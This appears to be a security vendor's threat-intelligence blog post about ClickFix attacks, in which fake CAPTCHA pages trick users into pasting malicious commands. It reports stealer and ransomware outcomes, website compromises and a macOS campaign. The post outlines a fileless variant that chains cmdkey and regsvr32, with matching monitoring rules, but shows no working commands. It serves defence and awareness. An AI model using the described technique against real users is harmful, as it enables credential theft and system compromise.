Skip to content
Contact us

ClickFix: The Attack That Turns Your Employees Into Their Own Hackers

ClickFix: The Attack That Turns Your Employees Into Their Own Hackers
5:58

ClickFix: The Attack That Turns Your Employees Into Their Own Hackers

THREAT INTELLIGENCE | JUNE 2026

A user visits what looks like a normal website. A message appears — browser error, CAPTCHA failed, update required. The site instructs them to copy a command and paste it into PowerShell. They do it. Malware installs silently. Credentials are gone.

No exploit. No suspicious attachment. No warning from the firewall. The user did it themselves.

This is ClickFix, and it is one of the fastest-growing attack techniques in 2026.

Why Security Tools Don't Stop It

Most endpoint security is built to detect software behaving maliciously. ClickFix removes software from the equation entirely. The user runs the command. To your security stack, it looks like a normal user action — because it is. There is nothing automated to flag.

Attackers are also actively hardening the technique against detection. Some are using server-side polymorphism, where the attacker's server generates a unique, freshly obfuscated payload for every request. Signature-based tools cannot match a hash that has never been seen before. A newer variant abandons PowerShell entirely and chains native Windows tools — cmdkey and regsvr32 — to deliver a remote payload without ever dropping a file on disk. The execution blends into normal system behavior.

The barrier to running one of these attacks is also nearly zero. An attacker with no programming background can stand up a live ClickFix campaign in under ten minutes using commercially available builders that handle page generation, payload delivery, and live victim monitoring.

What Is Being Stolen

The payloads vary, but the outcomes are consistently severe. Info stealers harvest saved passwords, browser cookies, credit card data, and crypto wallet keys. Remote access trojans hand the attacker full control of the victim's machine — files, webcam, keystrokes. Ransomware loaders encrypt everything and demand payment.

One commercially available tool called Venom Stealer illustrates how industrialized this has become. Rather than stealing credentials once and exiting, Venom maintains persistence — continuously monitoring browser databases and capturing newly saved credentials in real time. It runs on a subscription model. An attacker can rent it starting at $250 per month. This persistence is why common incident response moves like password rotation don't fully close the exposure: newly updated credentials get intercepted too.

The Scale in 2026

This is not a niche threat. Microsoft tracked roughly 8.3 billion email-based phishing attempts in Q1 2026. CAPTCHA-gated attacks specifically more than doubled in March, reaching nearly 12 million — the highest volume in over a year.

A SQL injection vulnerability in Ghost CMS was exploited to silently poison over 700 websites with ClickFix malware. Among the confirmed victims: websites operated by Harvard, Oxford, and Auburn universities, spanning industries from fintech to security research. ClickFix has also expanded to macOS. Attackers purchased Google Ads redirecting users to fake documentation sites for AI developer tools including Claude Code, Grok, and Gemini CLI. A ClickFix-style terminal prompt tricked users into running a command that installed the AMOS Stealer. Engineers, developers, and product leads are disproportionately Mac users with access to source code repositories and privileged cloud credentials — which makes them high-value targets.

What Your Organization Should Do

Train your employees on the one rule that breaks this attack. No legitimate website — not Cloudflare, not Google, not Microsoft — will ever ask a user to open a terminal, PowerShell window, or Run dialog and paste in a command. This is a universal rule with no exceptions. The entire ClickFix attack chain collapses the moment that rule is understood and believed. Regular phishing simulations that include fake CAPTCHA scenarios are the most direct way to reinforce it.

Enforce phishing-resistant MFA on privileged accounts. Deploy passwordless authentication using FIDO keys and enforce phishing-resistant multi-factor authentication through conditional access policies for any account with elevated access. A stolen password should never be sufficient on its own.

Restrict and monitor the execution paths attackers rely on. Limit PowerShell usage for standard users, disable the Run dialog where it isn't needed, and monitor for cmdkey usage involving external IP addresses and regsvr32 loading remote DLLs over UNC paths. Set alerts for chained command execution through cmd.exe and restrict outbound SMB and UNC access at the network level.

Treat your macOS endpoints as seriously as Windows. Your SOC needs the capability to analyze macOS samples behaviorally. Implement user education specifically around AI platform trust. Apply the same endpoint detection, logging, and incident response coverage to macOS that you apply to everything else. The assumption that Macs are lower risk is exactly what attackers are counting on.

The Bottom Line

ClickFix requires no zero-day, no sophisticated delivery chain, and no technical skill from the attacker. It requires only that an employee trusts a fake CAPTCHA and follows instructions. That is a training problem — and it is a solvable one.

SecureCyber Managed SOC services has demonstrated capability to stop and respond to ClickFix attacks and their evolving variants to keep your organization secure. 

If you want to assess your organization's exposure or run a ClickFix-focused phishing simulation with your team, SecureCyber can help.

www.secdef.com | 937-388-4405 | sales@secdef.com